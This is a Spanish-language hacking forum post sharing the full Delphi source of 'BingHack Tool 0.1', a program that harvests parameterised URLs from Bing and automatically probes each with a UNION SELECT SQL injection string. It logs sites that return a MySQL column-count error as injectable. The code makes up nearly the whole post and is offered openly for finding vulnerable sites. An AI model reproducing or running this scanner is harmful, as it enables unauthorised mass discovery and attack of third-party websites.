comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Delphi] BingHack Tool 0.1

  • 0 Respuestas
  • 1288 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Mayo 31, 2013, 03:53:33 pm »
Traduccion a delphi de este programa para buscar paginas vulnerables a SQLI usando bing.

Una imagen :



El codigo :

Código: Delphi
  1. // BingHackTool 0.1
  2. // Coded By Doddy H
  3.  
  4. unit bing;
  5.  
  6. interface
  7.  
  8. uses
  9.   Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  10.   Dialogs, StdCtrls, sButton, sMemo, sSkinManager, PerlRegEx, IdBaseComponent,
  11.   IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, sEdit, sLabel, sGroupBox,
  12.   sListBox, ComCtrls, sStatusBar, ShellApi, jpeg, ExtCtrls;
  13.  
  14. type
  15.   TForm1 = class(TForm)
  16.     IdHTTP1: TIdHTTP;
  17.     PerlRegEx1: TPerlRegEx;
  18.     sSkinManager1: TsSkinManager;
  19.     PerlRegEx2: TPerlRegEx;
  20.     sGroupBox1: TsGroupBox;
  21.     sLabel1: TsLabel;
  22.     sEdit1: TsEdit;
  23.     sLabel2: TsLabel;
  24.     sEdit2: TsEdit;
  25.     sGroupBox2: TsGroupBox;
  26.     sListBox1: TsListBox;
  27.     sGroupBox3: TsGroupBox;
  28.     sListBox2: TsListBox;
  29.     sStatusBar1: TsStatusBar;
  30.     sGroupBox4: TsGroupBox;
  31.     sButton1: TsButton;
  32.     sButton2: TsButton;
  33.     sButton3: TsButton;
  34.     sButton4: TsButton;
  35.     Image1: TImage;
  36.     procedure sButton1Click(Sender: TObject);
  37.     procedure sButton4Click(Sender: TObject);
  38.     procedure sButton3Click(Sender: TObject);
  39.     procedure FormCreate(Sender: TObject);
  40.     procedure sButton2Click(Sender: TObject);
  41.     procedure sListBox1DblClick(Sender: TObject);
  42.     procedure sListBox2DblClick(Sender: TObject);
  43.  
  44.   private
  45.     { Private declarations }
  46.   public
  47.     { Public declarations }
  48.   end;
  49.  
  50. var
  51.   Form1: TForm1;
  52.  
  53. implementation
  54.  
  55. {$R *.dfm}
  56.  
  57. procedure savefile(filename, texto: string);
  58. var
  59.   ar: TextFile;
  60.  
  61. begin
  62.  
  63.   AssignFile(ar, filename);
  64.   FileMode := fmOpenWrite;
  65.  
  66.   if FileExists(filename) then
  67.     Append(ar)
  68.   else
  69.     Rewrite(ar);
  70.  
  71.   Writeln(ar, texto);
  72.   CloseFile(ar);
  73.  
  74. end;
  75.  
  76. procedure TForm1.FormCreate(Sender: TObject);
  77. var
  78.   dir: string;
  79. begin
  80.  
  81.   sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  82.   sSkinManager1.SkinName := 'falloutstyle';
  83.   sSkinManager1.Active := True;
  84.  
  85.   dir := ExtractFilePath(Application.ExeName) + '/logs';
  86.  
  87.   if not(DirectoryExists(dir)) then
  88.   begin
  89.     CreateDir(dir);
  90.   end;
  91.  
  92.   ChDir(dir);
  93.  
  94. end;
  95.  
  96. procedure TForm1.sButton1Click(Sender: TObject);
  97. var
  98.   code: string;
  99.   link1: string;
  100.   linkfinal: string;
  101.   z: integer;
  102.   i: integer;
  103.   ii: integer;
  104.   chau: TStringList;
  105.   target: string;
  106.  
  107. begin
  108.  
  109.   sListBox1.Items.Clear;
  110.  
  111.   target := StringReplace(sEdit1.text, ' ', '+', []);
  112.  
  113.   sStatusBar1.Panels[0].text := '[+] Loading ...';
  114.   Form1.sStatusBar1.Update;
  115.  
  116.   for i := 1 to StrToInt(sEdit2.text) do
  117.   begin
  118.     ii := i * 10;
  119.     sListBox1.Update;
  120.     sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
  121.     Form1.sStatusBar1.Update;
  122.  
  123.     code := IdHTTP1.Get('http://www.bing.com/search?q=' + target + '&first=' +
  124.         IntToStr(ii));
  125.  
  126.     PerlRegEx1.Regex := '<h3><a href="(.*?)"';
  127.     PerlRegEx1.Subject := code;
  128.  
  129.     while PerlRegEx1.MatchAgain do
  130.     begin
  131.       for z := 1 to PerlRegEx1.SubExpressionCount do
  132.         link1 := PerlRegEx1.SubExpressions[z];
  133.  
  134.       PerlRegEx2.Regex := '(.*?)=(.*?)';
  135.       PerlRegEx2.Subject := link1;
  136.  
  137.       if PerlRegEx2.Match then
  138.       begin
  139.         linkfinal := PerlRegEx2.SubExpressions[1] + '=';
  140.         sListBox1.Items.Add(linkfinal);
  141.       end;
  142.     end;
  143.   end;
  144.  
  145.   chau := TStringList.Create;
  146.  
  147.   chau.Duplicates := dupIgnore;
  148.   chau.Sorted := True;
  149.   chau.Assign(sListBox1.Items);
  150.   sListBox1.Items.Clear;
  151.   sListBox1.Items.Assign(chau);
  152.  
  153.   for i := sListBox1.Items.Count - 1 downto 0 do
  154.   begin
  155.     savefile('bing-search.txt', sListBox1.Items[i]);
  156.   end;
  157.  
  158.   sStatusBar1.Panels[0].text := '[+] Done';
  159.   Form1.sStatusBar1.Update;
  160.  
  161. end;
  162.  
  163. procedure TForm1.sButton2Click(Sender: TObject);
  164. var
  165.   i: integer;
  166.   code: string;
  167.  
  168. begin
  169.  
  170.   sListBox2.Items.Clear;
  171.  
  172.   sStatusBar1.Panels[0].text := '[+] Loading ...';
  173.   Form1.sStatusBar1.Update;
  174.  
  175.   for i := sListBox1.Items.Count - 1 downto 0 do
  176.   begin
  177.     try
  178.       begin
  179.  
  180.         sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
  181.         Form1.sStatusBar1.Update;
  182.         sListBox2.Update;
  183.         code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');
  184.  
  185.         PerlRegEx1.Regex :=
  186.           'The used SELECT statements have a different number of columns';
  187.         PerlRegEx1.Subject := code;
  188.  
  189.         if PerlRegEx1.Match then
  190.         begin
  191.           sListBox2.Items.Add(sListBox1.Items[i]);
  192.           savefile('sqli-founds.txt', sListBox1.Items[i]);
  193.         end;
  194.  
  195.       end;
  196.     except
  197.       on E: EIdHttpProtocolException do
  198.         ;
  199.       on E: Exception do
  200.         ;
  201.     end;
  202.  
  203.     sStatusBar1.Panels[0].text := '[+] Done';
  204.     Form1.sStatusBar1.Update;
  205.  
  206.   end;
  207.  
  208. end;
  209.  
  210. procedure TForm1.sButton3Click(Sender: TObject);
  211. begin
  212.   ShowMessage('Contact to lepuke[at]hotmail[com]');
  213. end;
  214.  
  215. procedure TForm1.sButton4Click(Sender: TObject);
  216. begin
  217.   Form1.Close();
  218. end;
  219.  
  220. procedure TForm1.sListBox1DblClick(Sender: TObject);
  221. begin
  222.   ShellExecute(Handle, 'open', 'bing-search.txt', nil, nil, SW_SHOWNORMAL);
  223. end;
  224.  
  225. procedure TForm1.sListBox2DblClick(Sender: TObject);
  226. begin
  227.   ShellExecute(Handle, 'open', 'sqli-founds.txt', nil, nil, SW_SHOWNORMAL);
  228. end;
  229.  
  230. end.
  231.  
  232. // The End ?
  233.  

Si quieren bajar el programa pueden hacerlo de aca.
« Última modificación: Mayo 31, 2013, 05:23:02 pm por Doddy »

 

¿Te gustó el post? COMPARTILO!



Eliminar acentos y otros agregados de un caracter/cadena Delphi 2009

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3259
Último mensaje Febrero 24, 2010, 04:57:14 pm
por ANTRAX
[Sintaxis general de Delphi] By: Geek Lord Venezuela [R00t] Team

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2050
Último mensaje Febrero 24, 2010, 04:35:15 pm
por ANTRAX
1er troyano en Delphi By: Geek Lord Venezuela [R00t] Team

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3490
Último mensaje Febrero 24, 2010, 04:34:48 pm
por ANTRAX
[Delphi] Project Spartacus 1.0 (Regalo de Navidad)

Iniciado por BigBear

Respuestas: 2
Vistas: 1677
Último mensaje Diciembre 26, 2014, 11:54:34 pm
por n4pst3r
Poner splash screen con progress bar en delphi

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2977
Último mensaje Febrero 24, 2010, 04:54:23 pm
por ANTRAX